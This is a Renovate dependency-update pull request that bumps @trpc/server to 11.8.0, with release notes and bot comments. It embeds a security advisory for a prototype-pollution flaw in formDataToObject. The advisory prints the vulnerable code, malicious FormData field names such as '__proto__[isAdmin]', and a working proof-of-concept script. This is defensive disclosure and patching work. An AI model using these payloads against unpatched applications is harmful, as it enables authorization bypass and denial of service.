fix(deps): update dependency @trpc/server to v11.8.0 [security]

[renovate]

This PR contains the following updates:

Package	Change	Age	Confidence
@trpc/server (source)	11.4.3 -> 11.8.0

---

tRPC has possible prototype pollution in experimental_nextAppDirCaller

CVE-2025-68130 / GHSA-43p4-m455-4f4j

More information

Details

Note that this vulnerability is only present when using experimental_caller / experimental_nextAppDirCaller.

Summary

A Prototype Pollution vulnerability exists in @trpc/server's formDataToObject function, which is used by the Next.js App Router adapter. An attacker can pollute Object.prototype by submitting specially crafted FormData field names, potentially leading to authorization bypass, denial of service, or other security impacts.

Affected Versions

• Package: @trpc/server
• Affected Versions: >=10.27.0
• Vulnerable Component: formDataToObject() in src/unstable-core-do-not-import/http/formDataToObject.ts

Vulnerability Details

Root Cause

The set() function in formDataToObject.ts recursively processes FormData field names containing bracket/dot notation (e.g., user[name], user.address.city) to create nested objects. However, it does not validate or sanitize dangerous keys like __proto__, constructor, or prototype.

Vulnerable Code

// packages/server/src/unstable-core-do-not-import/http/formDataToObject.ts
function set(obj, path, value) {
  if (path.length > 1) {
    const newPath = [...path];
    const key = newPath.shift();  // ← No validation of dangerous keys
    const nextKey = newPath[0];

    if (!obj[key]) {  // ← Accesses obj["__proto__"] which returns Object.prototype
      obj[key] = isNumberString(nextKey) ? [] : {};
    }
    
    set(obj[key], newPath, value);  // ← Recursively pollutes Object.prototype
    return;
  }
  // ...
}

export function formDataToObject(formData) {
  const obj = {};
  for (const [key, value] of formData.entries()) {
    const parts = key.split(/[\.\[\]]/).filter(Boolean);  // Splits "__proto__[isAdmin]" → ["__proto__", "isAdmin"]
    set(obj, parts, value);
  }
  return obj;
}

Attack Vector

When a user submits a form to a tRPC mutation using Next.js Server Actions, the nextAppDirCaller adapter processes the FormData:

// packages/server/src/adapters/next-app-dir/nextAppDirCaller.ts:88-89
if (normalizeFormData && input instanceof FormData) {
  input = formDataToObject(input);  // ← Vulnerable call
}

An attacker can craft FormData with malicious field names:

const formData = new FormData();
formData.append("__proto__[isAdmin]", "true");
formData.append("__proto__[role]", "superadmin");

When processed, this pollutes Object.prototype:

{}.isAdmin        // → "true"
{}.role           // → "superadmin"

Proof of Concept

##### Step 1: Create the project directory

mkdir trpc-vuln-poc
cd trpc-vuln-poc

##### Step 2: Initialize npm

npm init -y

##### Step 3: Install vulnerable tRPC

npm install @​trpc/server@11.7.2

##### Step 4: Create the test file 

---

Test.js

const { formDataToObject } = require('@​trpc/server/unstable-core-do-not-import');

console.log("=== PoC Prototype Pollution en tRPC ===\n");

console.log("[1] Estado inicial:");
console.log("    {}.isAdmin =", {}.isAdmin);

const fd = new FormData();
fd.append("__proto__[isAdmin]", "true");
fd.append("__proto__[role]", "superadmin");
fd.append("username", "attacker");

console.log("\n[2] FormData malicioso:");
console.log('    __proto__[isAdmin] = "true"');
console.log('    __proto__[role] = "superadmin"');

console.log("\n[3] Llamando formDataToObject()...");
const result = formDataToObject(fd);
console.log("    Resultado:", JSON.stringify(result));

console.log("\n[4] Después del ataque:");
console.log("    {}.isAdmin =", {}.isAdmin);
console.log("    {}.role =", {}.role);

const user = { id: 1, name: "john" };
console.log("\n[5] Impacto en autorización:");
console.log("    Usuario normal:", JSON.stringify(user));
console.log("    user.isAdmin =", user.isAdmin);

if (user.isAdmin) {
    console.log("\n    VULNERABLE - Authorization bypass exitoso!");
} else {
    console.log("\n    ✓ Seguro");
}

Impact

Authorization Bypass (HIGH)

Many applications check user permissions using property access:

// Vulnerable pattern
if (user.isAdmin) {
  // Grant admin access
}

After pollution, all objects will have isAdmin: "true", bypassing authorization.

Denial of Service (MEDIUM)

Polluting commonly used property names can crash applications:

formData.append("__proto__[toString]", "not_a_function");
// All subsequent .toString() calls will fail

Severity

• CVSS Score: 8.5 / 10 (High)
• Vector String: CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:H/VA:L/SC:L/SI:H/SA:L

References

• https://github.com/trpc/trpc/security/advisories/GHSA-43p4-m455-4f4j
• https://nvd.nist.gov/vuln/detail/CVE-2025-68130
• https://github.com/trpc/trpc/commit/78629d524968ef8db5a7adf68d8b95a44369d77e
• https://github.com/trpc/trpc

This data is provided by OSV and the GitHub Advisory Database (CC-BY 4.0).

---

Release Notes

trpc/trpc (@​trpc/server)

v11.8.0

Compare Source

What's Changed

• feat(server): support streaming in API Gateway REST API by @​anatolzak in #​7039

v11.7.2

Compare Source

What's Changed

• fix(server): missing sse options when using mergeRouter by @​timcole in #​7023

New Contributors

• @​KitsuneKode made their first contribution in #​6975
• @​timcole made their first contribution in #​7023

Full Changelog: trpc/trpc@v11.7.1...v11.7.2

v11.7.1

Compare Source

What's Changed

• fix(tanstack-react-query): keyPrefix of undefined by @​Nick-Lucas in #​6990

New Contributors

• @​theoludwig made their first contribution in #​6906

Full Changelog: trpc/trpc@v11.7.0...v11.7.1

v11.7.0

Compare Source

What's Changed

• fix(client): do not emit "connecting" when initializing websocket subscription by @​hmatthieu in #​6970
• fix(server): Export octet types by @​Nick-Lucas in #​6981
• feat(tanstack-react-query): Add QueryKey and MutationKey Prefix option by @​Nick-Lucas in #​6976

Full Changelog: trpc/trpc@v11.6.0...v11.7.0

v11.6.0

Compare Source

What's Changed

• feat: add precondition required response code by @​y-nk in #​6954
• fix(client): httpBatchStreamLink in React Native "stream ends with TypeError" by @​KATT in #​6960

New Contributors

• @​elrion018 made their first contribution in #​6932

Full Changelog: trpc/trpc@v11.5.1...v11.6.0

v11.5.1

Compare Source

What's Changed

• fix(server): fix property in JSDoc by @​jansepke in #​6928
• fix(server): export DataTransformer interface marked as public by @​BhaskarKulshrestha in #​6927
• fix(client): omit content type header in GET requests by @​anatolzak in #​6914

New Contributors

• @​jansepke made their first contribution in #​6928
• @​BhaskarKulshrestha made their first contribution in #​6927
• @​Strajk made their first contribution in #​6912
• @​cademis made their first contribution in #​6908
• @​iboughtbed made their first contribution in #​6886

Full Changelog: trpc/trpc@v11.5.0...v11.5.1

v11.5.0

Compare Source

What's Changed

• patch: prefer Standard Schema for input/output type inference by @​dzhu in #​6888
• feat(server): expose procedure path in resolver options by @​KATT in #​6902

New Contributors

• @​mrlubos made their first contribution in #​6880
• @​dzhu made their first contribution in #​6888
• @​cristijigau made their first contribution in #​6894

Full Changelog: trpc/trpc@v11.4.4...v11.5.0

v11.4.4

Compare Source

What's Changed

• patch: typescript 5.9 support by @​KATT in #​6877
• fix(client): httpBatchLink with custom transformed object at top level by @​KATT in #​6878
• fix: incompatible types in monorepo due to separate .d.ts for esm/cjs by @​KATT in #​6879

New Contributors

• @​ARAldhafeeri made their first contribution in #​6857
• @​ebg1223 made their first contribution in #​6851
• @​0xlakshan made their first contribution in #​6869

Full Changelog: trpc/trpc@v11.4.3...v11.4.4

---

Configuration

📅 Schedule: Branch creation - "" in timezone Europe/London, Automerge - At any time (no schedule defined).

🚦 Automerge: Disabled by config. Please merge this manually once you are satisfied.

♻ Rebasing: Never, or you tick the rebase/retry checkbox.

🔕 Ignore: Close this PR and you won't be reminded about this update again.

---

• If you want to rebase/retry this PR, check this box

---

This PR was generated by Mend Renovate. View the repository job log.

[github-actions]

Oops! Looks like you forgot to update the changelog. When updating CHANGELOG.md, please consider the following:

• Changelog is read by country implementors who might not always be familiar with all technical details of OpenCRVS. Keep language high-level, user friendly and avoid technical references to internals.
• Answer "What's new?", "Why was the change made?" and "Why should I care?" for each change.
• If it's a breaking change, include a migration guide answering "What do I need to do to upgrade?".

[github-actions]

This PR has been marked with label stale Since it has been inactive for 20 days. It will automatically be closed in 10 days if no further activity occurs.